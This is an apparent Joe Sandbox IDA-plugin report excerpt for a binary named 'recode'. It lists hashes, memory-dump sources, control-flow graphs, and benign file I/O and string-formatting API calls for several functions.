                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f97396e0319e27931d78492ccf0b9cb8279136db24d8a87a19ccee06fdeafcf3
                            • Instruction ID: f6bf8394b40bbacdfefa93d0612b6adf8917c5da06b3fd9d08805fa9ded9c46f
                            • Opcode Fuzzy Hash: f97396e0319e27931d78492ccf0b9cb8279136db24d8a87a19ccee06fdeafcf3
                            • Instruction Fuzzy Hash: DF913433A1868987E751CB3AD0013B9F750FF99785F588321DE4E22695EF79F48A8704
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                            • Instruction ID: 9c025c88384d619cfb8117b2ecfdc2a6957ccd5be18ec844ef817faaf0887022
                            • Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                            • Instruction Fuzzy Hash: 105108A66244B187EF10AF2AD8915BCB790E346743FD88476D65D82F91C52EC10EDF30
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 33d8e5e286ad73973943c78d97e87e9be050b1fc124fcca27dfb181f44542789
                            • Instruction ID: 1b10b14c5603eec93b232dbbe43c3b132311c02bc12c146ae6b9620b90d91062
                            • Opcode Fuzzy Hash: 33d8e5e286ad73973943c78d97e87e9be050b1fc124fcca27dfb181f44542789
                            • Instruction Fuzzy Hash: AF71D332F18A99AAE711DB36C4512EDF360FB49348F889631EE0C27AD5DF38A149D750
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 538ea2ad5bd2fb4fe6d81ba0d59a8811a34a1620a173e368336fb8661de9eedc
                            • Instruction ID: df01e2e32ef1ad139685d7199ad0fb0fd192ec56fd41805262f1286acf331fdd
                            • Opcode Fuzzy Hash: 538ea2ad5bd2fb4fe6d81ba0d59a8811a34a1620a173e368336fb8661de9eedc
                            • Instruction Fuzzy Hash: B8517622B18B95C7EB119F14E94477AF7A1BB44740F881430EEAE93BA0EB3CD959C354
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8f14fe6ba9eea975047793fed720076f3b2667d6a7bbb639c72a74945885e3ac
                            • Instruction ID: 338612dc81979d855f70db4565f39d93df013b903583a79dd5ec84d66b024169
                            • Opcode Fuzzy Hash: 8f14fe6ba9eea975047793fed720076f3b2667d6a7bbb639c72a74945885e3ac
                            • Instruction Fuzzy Hash: 16413F7272895283EB6D8A14E661F3BEA53B780741FD89039ED8F52FD4DA3CC8458714
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eec30ed38b9a1dc373ec42dd730c738dd4bacb006e68fd3199f4bf1d9e7345a0
                            • Instruction ID: 2cac64392a0abeb3796b18f80243dbe16e6b40875d6a45e8a734d30520160883
                            • Opcode Fuzzy Hash: eec30ed38b9a1dc373ec42dd730c738dd4bacb006e68fd3199f4bf1d9e7345a0
                            • Instruction Fuzzy Hash: E8416C11F18EC986F5619626D0402BEF251AF6E784F9DC333ED8D227D4DB7DE48A4214
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3420e20df03badd24aaa54bd4c61b19e58e536c0e4c61f36d51288c3e30ed51
                            • Instruction ID: faf9386e2c82d06b68dc2f976854f3b2449fd083b1be938a73bf4ec359c04670
                            • Opcode Fuzzy Hash: a3420e20df03badd24aaa54bd4c61b19e58e536c0e4c61f36d51288c3e30ed51
                            • Instruction Fuzzy Hash: 0851F636610A8582DB54DF2AE454B9E77A1FB8DF84F49A132DF4E03B68CF39D0598B00
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1b36c61d506bdacbf90a336c46c2d0ba0d7d2407275ca43d9c684d4c8faa04a4
                            • Instruction ID: edf0c70dbf3c317a5eb64b0e272719f709d0d11174e485d5b47c2484751e14df
                            • Opcode Fuzzy Hash: 1b36c61d506bdacbf90a336c46c2d0ba0d7d2407275ca43d9c684d4c8faa04a4
                            • Instruction Fuzzy Hash: 524128B2B241F95FEA98C6665824F3D7F51D3D2742789A606FF8027D48C13C9512DBA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e0473899e094508e9459fd5acf522701ec408347876bf11e5b01aa5126d90771
                            • Instruction ID: 67e9e7819a4a6b54fb6ba72482c849ba8078ac36d82cadaef991a471ccc798f1
                            • Opcode Fuzzy Hash: e0473899e094508e9459fd5acf522701ec408347876bf11e5b01aa5126d90771
                            • Instruction Fuzzy Hash: 6001F9717002A287DB18CA66D4F09793350F394B82BC6213FDF4D4B681DE3C9565C720

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1377 7ff758033980-7ff7580339b3 1378 7ff7580339b9-7ff7580339d2 1377->1378 1379 7ff758033c63-7ff758033c6b 1377->1379 1380 7ff7580339d5-7ff7580339d9 1378->1380 1381 7ff758033c0b-7ff758033c3c 1380->1381 1382 7ff7580339df-7ff758033a08 1380->1382 1381->1380 1383 7ff758033c42-7ff758033c5b 1381->1383 1384 7ff758033a0a-7ff758033a0d 1382->1384 1385 7ff758033a1d-7ff758033a37 1382->1385 1383->1379 1384->1385 1386 7ff758033a0f-7ff758033a12 1384->1386 1387 7ff758033a39-7ff758033a4b call 7ff758010950 1385->1387 1388 7ff758033a6a-7ff758033a99 call 7ff75801ef70 1385->1388 1386->1385 1389 7ff758033a14-7ff758033a17 1386->1389 1394 7ff758033a4d-7ff758033a5c memmove call 7ff758010970 1387->1394 1395 7ff758033a61-7ff758033a67 1387->1395 1396 7ff758033a9d-7ff758033aaf call 7ff75801ef70 1388->1396 1397 7ff758033a9b 1388->1397 1389->1381 1389->1385 1394->1395 1395->1388 1399 7ff758033ab4-7ff758033abf 1396->1399 1397->1396 1397->1399 1401 7ff758033bef-7ff758033c09 call 7ff75801eea0 1399->1401 1402 7ff758033ac5-7ff758033ac9 1399->1402 1401->1381 1404 7ff758033aee-7ff758033b07 call 7ff75801ef70 1402->1404 1405 7ff758033acb-7ff758033ace 1402->1405 1412 7ff758033b09-7ff758033b13 call 7ff75801ef70 1404->1412 1413 7ff758033b18-7ff758033b1b 1404->1413 1405->1404 1407 7ff758033ad0-7ff758033ad3 1405->1407 1407->1404 1409 7ff758033ad5-7ff758033ad8 1407->1409 1409->1404 1411 7ff758033ada-7ff758033add 1409->1411 1414 7ff758033bdc-7ff758033be9 1411->1414 1415 7ff758033ae3-7ff758033ae8 1411->1415 1412->1413 1417 7ff758033b58-7ff758033b5b 1413->1417 1418 7ff758033b1d-7ff758033b21 1413->1418 1414->1401 1414->1402 1415->1404 1415->1414 1419 7ff758033b79-7ff758033b7c 1417->1419 1420 7ff758033b5d-7ff758033b74 call 7ff75801ef70 1417->1420 1421 7ff758033b23-7ff758033b42 call 7ff75801ef70 1418->1421 1422 7ff758033b44-7ff758033b53 call 7ff75801ef70 1418->1422 1425 7ff758033b7e-7ff758033b8d call 7ff75801ef70 1419->1425 1426 7ff758033b92-7ff758033b95 1419->1426 1420->1419 1421->1417 1421->1422 1422->1417 1425->1426 1429 7ff758033bca-7ff758033bd7 call 7ff75801eea0 1426->1429 1430 7ff758033b97-7ff758033b9f 1426->1430 1429->1414 1430->1429 1432 7ff758033ba1-7ff758033bc5 call 7ff75801ef70 1430->1432 1432->1429
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove
                            • String ID: Order=%d$ Sort=%d%c$ UserID=%08X$ Visible=%d$ Weight=%.4f$ Width=%d$Column %-2d$RefScale=%g$[%s][0x%08X,%d]
                            • API String ID: 2162964266-1650977620
                            • Opcode ID: 68450266f2cd21e246bf2f9f1218d3c5b42b3427f3058cf0a4ebf63c7b9fb405
                            • Instruction ID: e376896f6960bde5808ca366b3a11a935be072be9ab4f1ae1e35a2585c2a7100
                            • Opcode Fuzzy Hash: 68450266f2cd21e246bf2f9f1218d3c5b42b3427f3058cf0a4ebf63c7b9fb405
                            • Instruction Fuzzy Hash: F781DB22B18A9642EB24AB1AD68167EF3A1EF40B84F898031DE4C476D5EF3DD449C764

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1554 7ff75800e250-7ff75800e262 1555 7ff75800e26b-7ff75800e276 call 7ff75800e3b0 1554->1555 1556 7ff75800e264 1554->1556 1559 7ff75800e278-7ff75800e280 1555->1559 1560 7ff75800e281-7ff75800e29e ftell 1555->1560 1556->1555 1561 7ff75800e38b-7ff75800e38e fclose 1560->1561 1562 7ff75800e2a4-7ff75800e2b7 fseek 1560->1562 1564 7ff75800e394 1561->1564 1562->1561 1563 7ff75800e2bd-7ff75800e2cc ftell 1562->1563 1563->1561 1565 7ff75800e2d2-7ff75800e2e2 fseek 1563->1565 1566 7ff75800e396-7ff75800e3ad 1564->1566 1565->1561 1567 7ff75800e2e8-7ff75800e2ec 1565->1567 1567->1561 1568 7ff75800e2f2-7ff75800e2fc 1567->1568 1569 7ff75800e2fe 1568->1569 1570 7ff75800e304-7ff75800e31b 1568->1570 1569->1570 1570->1561 1572 7ff75800e31d-7ff75800e334 fread 1570->1572 1573 7ff75800e363-7ff75800e365 1572->1573 1574 7ff75800e336-7ff75800e349 fclose 1572->1574 1575 7ff75800e367-7ff75800e370 memset 1573->1575 1576 7ff75800e375-7ff75800e381 fclose 1573->1576 1577 7ff75800e34b 1574->1577 1578 7ff75800e351-7ff75800e361 1574->1578 1575->1576 1579 7ff75800e383 1576->1579 1580 7ff75800e386-7ff75800e389 1576->1580 1577->1578 1578->1564 1579->1580 1580->1566
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: fclose$fseekftell$freadmemset
                            • String ID:
                            • API String ID: 3913406393-0
                            • Opcode ID: bafc0319668b9307758dd6b677361da32d691bfb998c009046ba77b346d93747
                            • Instruction ID: 23be8c8ce4153fa1cf5f9920ca4db49723d49aab6fb3b0da44b8ebc51d6d330b
                            • Opcode Fuzzy Hash: bafc0319668b9307758dd6b677361da32d691bfb998c009046ba77b346d93747
                            • Instruction Fuzzy Hash: 1F315321B0AB43C3EA64AB16A959339E790AF45B90FCC0135DD6E537D0EF3CE45A8364

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1692 7ff758002020-7ff75800208f call 7ff75805fb48 1695 7ff758002094-7ff7580020c2 call 7ff758002e30 1692->1695 1696 7ff758002091 1692->1696 1699 7ff7580020c4 1695->1699 1700 7ff7580020c7-7ff758002115 call 7ff758002e30 1695->1700 1696->1695 1699->1700 1703 7ff758002190-7ff7580021d3 call 7ff758002d20 * 3 1700->1703 1704 7ff758002117-7ff75800211e 1700->1704 1725 7ff7580021d5-7ff7580021fc call 7ff758002d20 * 2 1703->1725 1726 7ff758002201-7ff75800220c 1703->1726 1704->1703 1706 7ff758002120 1704->1706 1708 7ff758002136-7ff75800213a 1706->1708 1709 7ff758002122-7ff758002134 call 7ff758002f90 1706->1709 1708->1703 1710 7ff75800213c-7ff758002140 1708->1710 1709->1703 1710->1703 1713 7ff758002142-7ff758002162 memmove 1710->1713 1716 7ff758002164-7ff758002177 1713->1716 1717 7ff758002180-7ff758002188 call 7ff75805df08 1713->1717 1719 7ff75800217d 1716->1719 1720 7ff75800222a-7ff758002230 _invalid_parameter_noinfo_noreturn 1716->1720 1717->1703 1719->1717 1724 7ff758002231-7ff75800223c call 7ff758003390 1720->1724 1735 7ff75800223d-7ff758002245 1724->1735 1725->1726 1726->1724 1728 7ff75800220e-7ff75800221d 1726->1728 1731 7ff758002222-7ff758002228 1728->1731 1732 7ff75800221f 1728->1732 1731->1735 1732->1731 1736 7ff75800227b-7ff758002293 1735->1736 1737 7ff758002247-7ff758002258 1735->1737 1738 7ff758002295-7ff7580022a6 1736->1738 1739 7ff7580022c9-7ff7580022f3 call 7ff75805e020 1736->1739 1740 7ff758002276 call 7ff75805df08 1737->1740 1741 7ff75800225a-7ff75800226d 1737->1741 1743 7ff7580022c4 call 7ff75805df08 1738->1743 1744 7ff7580022a8-7ff7580022bb 1738->1744 1740->1736 1741->1740 1746 7ff75800226f-7ff758002275 _invalid_parameter_noinfo_noreturn 1741->1746 1743->1739 1744->1743 1747 7ff7580022bd-7ff7580022c3 _invalid_parameter_noinfo_noreturn 1744->1747 1746->1740 1747->1743
                            APIs
                            • __std_fs_code_page.MSVCPRT ref: 00007FF75800207F
                              • Part of subcall function 00007FF75805FB48: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF758002084), ref: 00007FF75805FB4C
                              • Part of subcall function 00007FF75805FB48: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF758002084), ref: 00007FF75805FB5B
                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF75800214F
                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF75800222A
                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF75800226F
                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF7580022BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememmove
                            • String ID: ", "$: "
                            • API String ID: 1229626011-747220369
                            • Opcode ID: b508b6262a71f00ab062f283f32db5292dfa2acd2517a13f146330ffd8cdb86a
                            • Instruction ID: 0e20f1f279d1d951e42031827b80c2ccf2e8192ccdce7f1fb187b7b737e6d245
                            • Opcode Fuzzy Hash: b508b6262a71f00ab062f283f32db5292dfa2acd2517a13f146330ffd8cdb86a
                            • Instruction Fuzzy Hash: 6C81BE62B08B41DAEB05EF65E4543BCE361EB08B88F844532DE6D17BC9DE38E499C354
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 45280bfb13901e7b31f040bd1d43ad789039104c8f97e8369baa11062aa915f6
                            • Instruction ID: 2b2b0d5f16ea4b012ff53f35e498c08c8609cbd100acc4998745148ded47873d
                            • Opcode Fuzzy Hash: 45280bfb13901e7b31f040bd1d43ad789039104c8f97e8369baa11062aa915f6
                            • Instruction Fuzzy Hash: E6717E02D28BCE42F1A3663651437FDE2805FBF285E9D9723B99C390F29F5836DA4518
                            APIs
                              • Part of subcall function 00007FF75800E3B0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E3EB
                              • Part of subcall function 00007FF75800E3B0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E40D
                              • Part of subcall function 00007FF75800E3B0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E476
                              • Part of subcall function 00007FF75800E3B0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E49A
                              • Part of subcall function 00007FF75800E3B0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E4A6
                            • ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DAD6
                            • fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DAF2
                            • ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB03
                            • fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB1D
                            • fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB6D
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB7B
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB83
                              • Part of subcall function 00007FF758010380: memmove.VCRUNTIME140 ref: 00007FF75801041A
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DBC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$fclose$fseekftell$_wfopenfreadmemmove
                            • String ID:
                            • API String ID: 3216918565-0
                            • Opcode ID: f14a65b11aa5200585e567fa9ae2d8e8391c0c5e8006d4771b0bd32d06acc466
                            • Instruction ID: 39b74030c843c54f5d991e6d7de84d1c4edf876a4a96bf15469af02c6ac2798d
                            • Opcode Fuzzy Hash: f14a65b11aa5200585e567fa9ae2d8e8391c0c5e8006d4771b0bd32d06acc466
                            • Instruction Fuzzy Hash: 7341B421B09A86C7EA54BB269854339E390AF45BE4F8C0231DD1F077D5EF3CE44A8768
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
